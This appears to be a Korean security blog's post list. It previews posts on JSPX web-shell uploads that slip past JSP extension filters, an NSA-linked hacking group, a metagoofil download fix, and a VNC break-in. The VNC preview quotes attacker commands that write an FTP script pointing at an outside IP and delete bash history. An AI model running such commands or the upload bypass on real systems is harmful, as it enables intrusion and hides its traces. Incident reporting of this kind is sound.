| JSP 웹 쉘 업로드 취약점 막으셨나요? JSPX는요?
|
| 한국은 공공기관을 중심으로 정말 많은 곳에서 JSP(JavaServer Pages)를 사용합니다.
파일업로드 취약점 제거를 위해 대개 JSP 확장자로 된 파일 올리기를 금지하고 있습니다.
그런데, 가끔씩 jspx 확장자 파일 첨부가 가능한 경우가 발생합니다.
JSPX 웹쉘 업로드로... |
| |
공개
| 댓글: 1 | 첨부파일: 1 |
등록자: jinsuk |
등록일:
|
| |
| 美NSA 또?…30개국서 스파이활동
|
| 15년만에 발각된 고차원의 사이버 해커 그룹, NSA가 배후?
세계 최고 실력 가진 해킹 단체, 꼬리 잡히다
스턱스넷과 플레임보다 먼저 활동 시작했으면서 더 고도화
다양한 종류의 하드드라이브 해킹, 에어갭 해킹도 가능
NSA가 배후에? 아직은 정황상 증거일 뿐 속단할 수 없어 |
| |
공개
| 댓글: 1 | 첨부파일: 2 |
등록자: jinsuk |
등록일:
|
| |
| | metagoofil.py의 다운로드 오류 수정
|
| Bactrak 5 R3에서 metagoofil을 실행하면 다운로드가 안됩니다.
downloader.py 파일을 다음과 같이 수정하면 됩니다.
수정전:
self.url=url
self.dir=dir
... |
| |
공개
| 댓글: 0 | 첨부파일: 0 |
등록자: jinsuk |
등록일:
|
| |
| | VNC를 타고 들어오는 해킹 사례
|
| 어제 집에서 VNC를 이용하여 회사 PC로 접속했는데 내가 입력하지 않았음에도 누군가 입력을 한다...
해킹당했다...
무섭다...
입력예는 다음과 같다.
$ del eq&echo open 94.156.162.165 17704 >> eq&ecne
$ rm .bash_hist... |
| |
공개
| 댓글: 3 | 첨부파일: 0 |
등록자: jinsuk |
등록일:
|
| |
|
